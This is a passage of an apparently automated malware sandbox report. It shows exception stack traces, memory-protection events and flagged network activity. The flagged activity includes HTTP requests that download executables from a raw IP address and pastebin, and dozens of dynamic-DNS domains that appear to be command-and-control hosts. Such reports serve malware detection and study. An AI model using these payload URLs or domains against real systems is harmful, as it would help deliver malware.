registers.ebx: 36719548 registers.esi: 36719528 registers.ecx: 0	1
__exception__ May 2, 2022, 8:58 a.m.	stacktrace: 0x8c4680 mscorlib+0x30c9ff @ 0x71d5c9ff mscorlib+0x302367 @ 0x71d52367 mscorlib+0x3022a6 @ 0x71d522a6 mscorlib+0x302261 @ 0x71d52261 mscorlib+0x30ca7c @ 0x71d5ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72a12652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72a2264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72a22e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x72ab07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x72a87d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x72a87dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x72a87e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x72a1c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x72ab0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x72b2a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 8b 01 8b 40 28 ff 50 1c eb 11 8b c8 e8 35 ef 98 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x8c46ea registers.esp: 95088748 registers.edi: 95088772 registers.eax: 0 registers.ebp: 95088788 registers.edx: 1093 registers.ebx: 36719548 registers.esi: 36719528 registers.ecx: 0	1
__exception__ May 2, 2022, 8:58 a.m.	stacktrace: 0x8c4680 mscorlib+0x30c9ff @ 0x71d5c9ff mscorlib+0x302367 @ 0x71d52367 mscorlib+0x3022a6 @ 0x71d522a6 mscorlib+0x302261 @ 0x71d52261 mscorlib+0x30ca7c @ 0x71d5ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72a12652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72a2264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72a22e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x72ab07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x72a87d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x72a87dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x72a87e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x72a1c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x72ab0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x72b2a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 8b 01 8b 40 30 ff 50 10 eb 11 8b c8 e8 14 ef 98 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x8c470b registers.esp: 95088748 registers.edi: 95088772 registers.eax: 95088748 registers.ebp: 95088788 registers.edx: 9193221 registers.ebx: 36719548 registers.esi: 36719528 registers.ecx: 0	1
__exception__ May 2, 2022, 8:57 a.m.	stacktrace: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefda7a49d RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefde573c3 ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7feff1d43bf IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefde75295 I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefde72799 Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefdf1af1e Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefdf1b76c NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefde748d6 CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7feff300883 CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7feff300ccd CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7feff300c43 CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7feff1ba4f0 GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7feff1cd551 CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7feff30347e CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7feff30122b CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7feff303542 GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7feff1cd42d GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7feff1cd1d6 TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x77379bd1 TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x773798da GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7feff1cd0ab CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7feff2f3e57 ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7feff1a0106 ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7feff1a0182 BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76f9652d RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x7748c521 exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00 exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d exception.instruction: add rsp, 0xc8 exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 42141 exception.address: 0x7fefda7a49d registers.r14: 0 registers.r15: 0 registers.rcx: 47834432 registers.rsi: 0 registers.r10: 0 registers.rbx: 0 registers.rsp: 47840384 registers.r11: 47836192 registers.r8: 0 registers.r9: 0 registers.rdx: 1 registers.r12: 0 registers.rbp: 0 registers.rdi: 0 registers.rax: 1971422145 registers.r13: 0	1
__exception__ May 2, 2022, 8:57 a.m.	stacktrace: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefda7a49d RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefde573c3 ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7feff1d43bf IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefde75295 I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefde72799 Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefdf1af1e Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefdf1b76c NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefde748d6 CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7feff300883 CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7feff300ccd CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7feff300c43 CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7feff1ba4f0 GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7feff1cd551 CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7feff30347e CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7feff30122b CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7feff303542 GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7feff1cd42d GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7feff1cd1d6 TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x77379bd1 TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x773798da GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7feff1cd0ab CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7feff2f3e57 ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7feff1a0106 ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7feff1a0182 BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76f9652d RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x7748c521 exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00 exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d exception.instruction: add rsp, 0xc8 exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 42141 exception.address: 0x7fefda7a49d registers.r14: 0 registers.r15: 0 registers.rcx: 49145392 registers.rsi: 0 registers.r10: 0 registers.rbx: 0 registers.rsp: 49151344 registers.r11: 49147152 registers.r8: 0 registers.r9: 0 registers.rdx: 1 registers.r12: 0 registers.rbp: 0 registers.rdi: 0 registers.rax: 1974836690 registers.r13: 0	1
__exception__ May 2, 2022, 8:57 a.m.	stacktrace: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefda7a49d RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefde573c3 ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7feff1d43bf IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefde75295 I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefde72799 Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefdf1af1e Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefdf1b76c NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefde748d6 CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7feff300883 CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7feff300ccd CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7feff300c43 CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7feff1ba4f0 GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7feff1cd551 CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7feff30347e CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7feff30122b CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7feff303542 GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7feff1cd42d GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7feff1cd1d6 TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x77379bd1 TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x773798da GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7feff1cd0ab CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7feff2f3e57 ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7feff1a0106 ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7feff1a0182 BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76f9652d RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x7748c521 exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00 exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d exception.instruction: add rsp, 0xc8 exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 42141 exception.address: 0x7fefda7a49d registers.r14: 0 registers.r15: 0 registers.rcx: 43312208 registers.rsi: 0 registers.r10: 0 registers.rbx: 0 registers.rsp: 43318160 registers.r11: 43313968 registers.r8: 0 registers.r9: 0 registers.rdx: 1 registers.r12: 0 registers.rbp: 0 registers.rdi: 0 registers.rax: 1976344978 registers.r13: 0	1
__exception__ May 2, 2022, 8:57 a.m.	stacktrace: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefda7a49d RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefde573c3 ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7feff1d43bf IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefde75295 I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefde72799 Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefdf1af1e Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefdf1b76c NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefde748d6 CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7feff300883 CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7feff300ccd CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7feff300c43 CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7feff1ba4f0 GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7feff1cd551 CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7feff30347e CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7feff30122b CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7feff303542 GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7feff1cd42d GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7feff1cd1d6 TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x77379bd1 TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x773798da GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7feff1cd0ab CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7feff2f3e57 ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7feff1a0106 ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7feff1a0182 BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76f9652d RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x7748c521 exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00 exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d exception.instruction: add rsp, 0xc8 exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 42141 exception.address: 0x7fefda7a49d registers.r14: 0 registers.r15: 0 registers.rcx: 49210560 registers.rsi: 0 registers.r10: 0 registers.rbx: 0 registers.rsp: 49216512 registers.r11: 49212320 registers.r8: 0 registers.r9: 0 registers.rdx: 1 registers.r12: 0 registers.rbp: 0 registers.rdi: 0 registers.rax: 1974910188 registers.r13: 0	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (3 events)

suspicious_features	Connection to IP address	suspicious_request	GET http://54.254.238.33/xm/win.com
suspicious_features	Connection to IP address	suspicious_request	GET http://54.254.238.33/xm/64a1.com
suspicious_features	GET method with no useragent header	suspicious_request	GET https://pastebin.com/raw/nEZ87Pwx

Connects to a Dynamic DNS Domain (48 events)

domain	niogem1171.ddns.net
domain	muslada2251.ddns.net
domain	rinot972.ddns.net
domain	marena9201.ddns.net
domain	muslada2251.myvnc.com
domain	niogem1171.myvnc.com
domain	muslada2251.servebeer.com
domain	niogem1171.servebeer.com
domain	niogem1171.serveminecraft.net
domain	muslada2251.serveminecraft.net
domain	muslada2251.serveblog.net
domain	niogem1171.serveblog.net
domain	niogem1171.servecounterstrike.com
domain	muslada2251.servecounterstrike.com
domain	muslada2251.servehttp.com
domain	niogem1171.servehttp.com
domain	marena9201.bounceme.net
domain	niogem1171.bounceme.net
domain	muslada2251.bounceme.net
domain	muslada2251.servequake.com
domain	niogem1171.servequake.com
domain	marena9201.3utilities.com
domain	niogem1171.3utilities.com
domain	muslada2251.3utilities.com
domain	muslada2251.redirectme.net
domain	niogem1171.redirectme.net
domain	muslada2251.servehalflife.com
domain	niogem1171.servehalflife.com
domain	niogem1171.zapto.org
domain	muslada2251.zapto.org
domain	muslada2251.hopto.org
domain	niogem1171.hopto.org
domain	muslada2251.sytes.net
domain	niogem1171.sytes.net
domain	niogem1171.serveftp.com
domain	muslada2251.serveftp.com
domain	niogem1171.servemp3.com
domain	muslada2251.servemp3.com
domain	muslada2251.myftp.org
domain	muslada2251.myftp.biz
domain	niogem1171.myftp.biz
domain	niogem1171.myftp.org
domain	niogem1171.servegame.com
domain	muslada2251.servegame.com
domain	rinot972.ddnsking.com
domain	niogem1171.ddnsking.com
domain	marena9201.ddnsking.com
domain	muslada2251.ddnsking.com

Performs some HTTP requests (6 events)

request	GET http://54.254.238.33/xm/win.com
request	GET http://54.254.238.33/xm/64a1.com
request	GET https://pastebin.com/raw/GUqDzHQW
request	GET https://pastebin.com/raw/h6SvjTQp
request	GET https://pastebin.com/raw/DVn2TV4Q
request	GET https://pastebin.com/raw/nEZ87Pwx

Allocates read-write-execute memory (usually to unpack itself) (50 out of 88 events)

Time & API	Arguments	Status
NtProtectVirtualMemory May 2, 2022, 8:56 a.m.	process_identifier: 2760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x739f2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 2, 2022, 8:56 a.m.	process_identifier: 2984 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74032000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 2, 2022, 8:56 a.m.	process_identifier: 2156 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007391c000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 2, 2022, 8:56 a.m.	process_identifier: 2276 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007391c000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 2, 2022, 8:56 a.m.	process_identifier: 196 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007391c000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 2, 2022, 8:56 a.m.	process_identifier: 2896 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000746e3000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 2, 2022, 8:57 a.m.	process_identifier: 1664 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000746e3000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 2, 2022, 8:57 a.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000746e3000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 2, 2022, 8:57 a.m.	process_identifier: 2296 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000746e3000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 2, 2022, 8:57 a.m.	process_identifier: 2568 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007391c000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 2, 2022, 8:57 a.m.	process_identifier: 2860 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007391c000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 2, 2022, 8:57 a.m.	process_identifier: 2964 region_size: 1114112 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00540000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2022, 8:57 a.m.	process_identifier: 2964 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00610000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 2, 2022, 8:57 a.m.	process_identifier: 2964 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72a11000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 2, 2022, 8:57 a.m.	process_identifier: 2964 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72a12000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2022, 8:57 a.m.	process_identifier: 2964 region_size: 1441792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a50000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2022, 8:57 a.m.	process_identifier: 2964 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b70000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2022, 8:57 a.m.	process_identifier: 2964 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00552000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2022, 8:57 a.m.	process_identifier: 2964 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00585000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2022, 8:57 a.m.	process_identifier: 2964 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0058b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2022, 8:57 a.m.	process_identifier: 2964 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00587000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2022, 8:57 a.m.	process_identifier: 2964 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0056c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2022, 8:57 a.m.	process_identifier: 2964 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00af0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2022, 8:57 a.m.	process_identifier: 2964 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0055a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2022, 8:57 a.m.	process_identifier: 2964 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00576000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2022, 8:57 a.m.	process_identifier: 2964 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef50000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2022, 8:57 a.m.	process_identifier: 2964 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2022, 8:57 a.m.	process_identifier: 2964 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 2, 2022, 8:57 a.m.	process_identifier: 2964 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef58000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
